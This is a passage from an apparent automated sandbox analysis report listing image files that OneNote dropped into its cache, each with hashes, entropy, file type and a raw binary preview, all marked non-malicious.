                                                                                                  Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007J.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2898
                                                                                                  Entropy (8bit):7.551512280854713
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                  MD5:7C7D9922101488124D2E4666709198AC
                                                                                                  SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                  SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                  SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007L.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):29187
                                                                                                  Entropy (8bit):7.971308326749753
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                  MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                  SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                  SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                  SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007N.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4819
                                                                                                  Entropy (8bit):7.874649683222419
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                  MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                  SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                  SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                  SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007P.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1717
                                                                                                  Entropy (8bit):7.154087739587035
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                  MD5:943371B39CA847674998535110462220
                                                                                                  SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                  SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                  SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007R.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3555
                                                                                                  Entropy (8bit):7.686253071499049
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                  MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                  SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                  SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                  SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007T.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3428
                                                                                                  Entropy (8bit):7.766473352510893
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                  MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                  SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                  SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                  SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007V.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65589
                                                                                                  Entropy (8bit):7.960181939300061
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                  MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                  SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                  SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                  SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000081.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1873
                                                                                                  Entropy (8bit):7.534961703340853
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                  MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                  SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                  SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                  SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000083.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5465
                                                                                                  Entropy (8bit):7.79401348966645
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                  MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                  SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                  SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                  SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000084.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3361
                                                                                                  Entropy (8bit):7.619405839796034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                  MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                  SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                  SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                  SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000086.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):140755
                                                                                                  Entropy (8bit):7.9013245181576695
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                  MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                  SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                  SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                  SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000088.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):129887
                                                                                                  Entropy (8bit):7.8877849553452695
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                  MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                  SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                  SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                  SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008A.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):84941
                                                                                                  Entropy (8bit):7.966881945560921
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                  MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                  SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                  SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                  SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008C.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1569
                                                                                                  Entropy (8bit):7.583832946136897
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
